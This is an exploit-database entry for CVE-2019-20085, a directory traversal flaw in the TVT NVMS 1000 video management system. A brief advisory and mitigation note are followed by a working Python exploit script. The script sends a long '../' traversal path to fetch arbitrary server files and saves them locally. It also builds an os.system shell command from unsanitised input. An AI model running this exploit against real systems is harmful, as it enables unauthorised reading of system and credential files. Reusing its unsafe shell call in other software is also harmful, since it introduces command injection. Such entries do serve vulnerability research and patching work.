TVT NVMS 1000 - Directory Traversal

vendor:

NVMS 1000

by:

Mohin Paramasivam (Shad0wQu35t)

7.5

CVSS

HIGH

Directory Traversal

CWE

Product Name: NVMS 1000

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: CVE-2019-20085

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: N/A

2020

TVT NVMS 1000 – Directory Traversal

TVT NVMS 1000 is vulnerable to directory traversal. An attacker can exploit this vulnerability to read arbitrary files from the server. This vulnerability is caused due to insufficient sanitization of user-supplied input to the 'filename' parameter in the 'get_file' function. An attacker can exploit this vulnerability by sending a crafted HTTP request containing directory traversal characters (e.g. '../') in the 'filename' parameter.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to update to the latest version of the software.

Source

Exploit-DB raw data:

# Exploit Title: TVT NVMS 1000 - Directory Traversal 
# Date: 2020-04-13
# Exploit Author: Mohin Paramasivam (Shad0wQu35t)
# Vendor Homepage: http://en.tvt.net.cn/
# Version : N/A
# Software Link : http://en.tvt.net.cn/products/188.html
# Original Author : Numan Türle
# CVE : CVE-2019-20085

import sys
import requests
import os
import time

if len(sys.argv) !=4:
	print "  "
	print "Usage : python exploit.py url filename outputname"
	print "Example : python exploit.py http://10.10.10.10/ windows/win.ini win.ini"	
	print "	"
else:


	traversal = "../../../../../../../../../../../../../"
	filename = sys.argv[2]
	url = sys.argv[1]+traversal+filename
	outputname = sys.argv[3]
	content = requests.get(url)

	if content.status_code == 200:
		
		print " "
		print "Directory Traversal Succeeded"
		time.sleep(3)
		print " "
		print "Saving Output"
		os.system("touch " + outputname)
		output_write = open(outputname,"r+")
		output_write.write(content.text)
		output_write.close()

	else:

		print "Host not vulnerable to Directory Traversal!"